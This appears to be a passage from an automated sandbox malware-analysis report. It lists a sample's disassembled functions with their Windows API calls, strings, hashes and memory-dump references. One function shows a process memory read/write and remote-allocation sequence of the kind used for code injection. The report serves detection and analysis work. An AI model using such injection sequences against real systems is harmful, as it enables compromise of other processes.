                                                                                                                                • Instruction Fuzzy Hash: 88A15A71604205AFC300EF64CC92EABB7EDEF88704F40491DB655D7192EB74EA49DBA2
                                                                                                                                Function 00F2DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #$+
                                                                                                                                • API String ID: 0-2552117581
                                                                                                                                • Opcode ID: 6638649d50cd9ee9552ab873afa9e8eeaa5d95d27950f7343cac18fb6081c01d
                                                                                                                                • Instruction ID: 3f96f81449e952bbd9f7226706eb3e94330ffb2ec8c92e18d3b6e01a289746b5
                                                                                                                                • Opcode Fuzzy Hash: 6638649d50cd9ee9552ab873afa9e8eeaa5d95d27950f7343cac18fb6081c01d
                                                                                                                                • Instruction Fuzzy Hash: B551433590826ACFDF15EF68D851AFA7BA4FF66320F180055F8819B2D1D734AD42EB60
                                                                                                                                Function 00F5503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00FADC40,?,0000000F,0000000C,00000016,00FADC40,?), ref: 00F5507B
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                  • Part of subcall function 00F1B8A7: _memmove.LIBCMT ref: 00F1B8FB
                                                                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00F550FB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                • String ID: REMOVE$THIS
                                                                                                                                • API String ID: 2528338962-776492005
                                                                                                                                • Opcode ID: 97540e213759f7f14ef07a28dd3d4b378c37c4554e787352782b307df881c830
                                                                                                                                • Instruction ID: 990fe0df8175d70e09a16a9ce3b0d054da6c25bf0a7155927c1780263cbc0994
                                                                                                                                • Opcode Fuzzy Hash: 97540e213759f7f14ef07a28dd3d4b378c37c4554e787352782b307df881c830
                                                                                                                                • Instruction Fuzzy Hash: 7841B435A00A099FCF00DF64CC91BAEBBB5BF48715F048069E956AB362DB349D49EF50
                                                                                                                                Function 00F4CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F54D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F4C9FE,?,?,00000034,00000800,?,00000034), ref: 00F54D6B
                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F4CFC9
                                                                                                                                  • Part of subcall function 00F54D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F4CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00F54D36
                                                                                                                                  • Part of subcall function 00F54C65: GetWindowThreadProcessId.USER32(?,?), ref: 00F54C90
                                                                                                                                  • Part of subcall function 00F54C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F4C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00F54CA0
                                                                                                                                  • Part of subcall function 00F54C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F4C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00F54CB6
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4D036
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4D083
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                • Opcode ID: 4d9f989994e7dfe8c0072ef6cb4ef814fe2e2ebb049ed6c0b8f4f5923f122791
                                                                                                                                • Instruction ID: 48eabd8a05077dd8baa5d33115298cef599b0491cf49a8e6aa99092a77671a86
                                                                                                                                • Opcode Fuzzy Hash: 4d9f989994e7dfe8c0072ef6cb4ef814fe2e2ebb049ed6c0b8f4f5923f122791
                                                                                                                                • Instruction Fuzzy Hash: 80413A7290021CAEDB10DFA8CC85ADEBBB8AF49710F108095EA45B7181DA756E89DB61
                                                                                                                                Function 00F7A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FADBF0,00000000,?,?,?,?), ref: 00F7A4E6
                                                                                                                                • GetWindowLongW.USER32 ref: 00F7A503
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F7A513
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Long
                                                                                                                                • String ID: SysTreeView32
                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                • Opcode ID: 829c70d21b221a78ec92039127b0e1e434e67001243a313c412df5744358c1d5
                                                                                                                                • Instruction ID: 0b8fb57f063b5db21d15285cb975ce4ed9bbd84311eb9ee9139e5cf8735604f2
                                                                                                                                • Opcode Fuzzy Hash: 829c70d21b221a78ec92039127b0e1e434e67001243a313c412df5744358c1d5
                                                                                                                                • Instruction Fuzzy Hash: 8A31F231600205AFDB118F38CC45BEA7B69FB89334F258316F879932E0D735E850AB52
                                                                                                                                Function 00F7A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F7A74F
                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F7A75D
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F7A764
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                • String ID: msctls_updown32
                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                • Opcode ID: 5578ae0b50cae69cf00467e23defb254f22b14792b092c4943230c44b3547fb3
                                                                                                                                • Instruction ID: 61e552f8078b601052f86f291556a7c2614fd720afd4180a8376f87a51116b1c
                                                                                                                                • Opcode Fuzzy Hash: 5578ae0b50cae69cf00467e23defb254f22b14792b092c4943230c44b3547fb3
                                                                                                                                • Instruction Fuzzy Hash: E62181B5A00209AFDB14DF64DCC1EAB37ADEB493A4B15405AFA0597351C770EC12EAA2
                                                                                                                                Function 00F797B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F7983D
                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F7984D
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F79872
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                • String ID: Listbox
                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                • Opcode ID: 5a24a924b28ad05afbf58b35a611af2d634115f9ecbb2f3846a162927d4f8e8c
                                                                                                                                • Instruction ID: a23eaca84a07248127a2db6824048ea8936361ce323f9710ef504019cb00e919
                                                                                                                                • Opcode Fuzzy Hash: 5a24a924b28ad05afbf58b35a611af2d634115f9ecbb2f3846a162927d4f8e8c
                                                                                                                                • Instruction Fuzzy Hash: 77210A32A14118BFDF158F54CC85FAB3B6AEF89764F11C126F5085B190C6B19C12E7A1
                                                                                                                                Function 00F7A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F7A27B
                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F7A290
                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F7A29D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                • Opcode ID: 6d4a113b33b20e9e12510d913c3f77dcb1f3e19226bb6e778943e60ef5a64318
                                                                                                                                • Instruction ID: c21f56acc4e31b33620c526f1c20c0c1209386751d25c1534a08a02374aa2e9b
                                                                                                                                • Opcode Fuzzy Hash: 6d4a113b33b20e9e12510d913c3f77dcb1f3e19226bb6e778943e60ef5a64318
                                                                                                                                • Instruction Fuzzy Hash: A311EB71600208BADB105F65CC46F9B3B69EFC8B54F128119FA4596091D272E851EB51
                                                                                                                                Function 00F32F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00F32F79
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000), ref: 00F32F80
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                                • API String ID: 1029625771-340411864
                                                                                                                                • Opcode ID: 87cb9eed899cef32d99848374a47210ac6a50c225179b215ea9b61c7796d01bd
                                                                                                                                • Instruction ID: d177d3c69366cad0c415b6a0d84580fd4f8aeea4e31a33c1756ce2579b62c74e
                                                                                                                                • Opcode Fuzzy Hash: 87cb9eed899cef32d99848374a47210ac6a50c225179b215ea9b61c7796d01bd
                                                                                                                                • Instruction Fuzzy Hash: 84E01A70A9530CAAEF507F70EE4AB153666E700B5AF200026B102D20A0CBB99054FF09
                                                                                                                                Function 00F33034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F32F4E), ref: 00F3304E
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000), ref: 00F33055
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                                • API String ID: 1029625771-2819208100
                                                                                                                                • Opcode ID: 3ee4f281f7714c023e9879b68387fdaf21643719b82d843ab4e7bcd3f1f926d7
                                                                                                                                • Instruction ID: 2810aca71b3ccba62d77a5ea3dfc2b553eeacc02e4c5f7bb21f22fce70556ba3
                                                                                                                                • Opcode Fuzzy Hash: 3ee4f281f7714c023e9879b68387fdaf21643719b82d843ab4e7bcd3f1f926d7
                                                                                                                                • Instruction Fuzzy Hash: 33E0ECB0A8630DABEB219F71EE0DB093B65B70075AF200016F109D20B4CFB8D510FB19
                                                                                                                                Function 00F8BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                                • Opcode ID: 6dcc6dc2e30083a4a88fe7ee1d445b01ef69ef7d195d73180639bfb90ad784b6
                                                                                                                                • Instruction ID: 311bdc142e2cd26d27e971a9a9ff71ddeb8df6c98cd3b9947d2addc843c77848
                                                                                                                                • Opcode Fuzzy Hash: 6dcc6dc2e30083a4a88fe7ee1d445b01ef69ef7d195d73180639bfb90ad784b6
                                                                                                                                • Instruction Fuzzy Hash: E9E0627384811CEACB58E7909D57BFA737CAB04700F6444D3BD16D1044D7399B54BB12
                                                                                                                                Function 00F720F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F720EC,?,00F722E0), ref: 00F72104
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,GetProcessId), ref: 00F72116
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                                                                • API String ID: 1029625771-399901964
                                                                                                                                • Opcode ID: bc30611ca3405074a7e55701e6d97d612199fef34f804bf0461be8dd19097285
                                                                                                                                • Instruction ID: 943c6c1bcd9d46f42a296459a8346507822d5d55ddd8ad98897472c0349bd922
                                                                                                                                • Opcode Fuzzy Hash: bc30611ca3405074a7e55701e6d97d612199fef34f804bf0461be8dd19097285
                                                                                                                                • Instruction Fuzzy Hash: 4DD0A7358003138FE7606F60F90EB4236D4BB04318B10841FE74DD2254D7B0C4C0EA11
                                                                                                                                Function 00F2E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F2E6D9,?,00F2E55B,00FADC28,?,?), ref: 00F2E6F1
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,IsWow64Process,?,?), ref: 00F2E703
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                • API String ID: 1029625771-3024904723
                                                                                                                                • Opcode ID: ba0eeda10854344c42550e0ac125c24d7b007584719c88ae8f4b91fd98e3d964
                                                                                                                                • Instruction ID: ae35ffbfa9af84ee7810fb3a5de689fa3ac7b2d0c411e838afcce75d7e0bbda9
                                                                                                                                • Opcode Fuzzy Hash: ba0eeda10854344c42550e0ac125c24d7b007584719c88ae8f4b91fd98e3d964
                                                                                                                                • Instruction Fuzzy Hash: 6BD0A9358003238FE7203F24F94DB833BE8FB04328B20442EE5A5E2260DBB0C8C4AA10
                                                                                                                                Function 00F2E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F2E69C,74DF0AE0,00F2E5AC,00FADC28,?,?), ref: 00F2E6B4
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00F2E6C6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
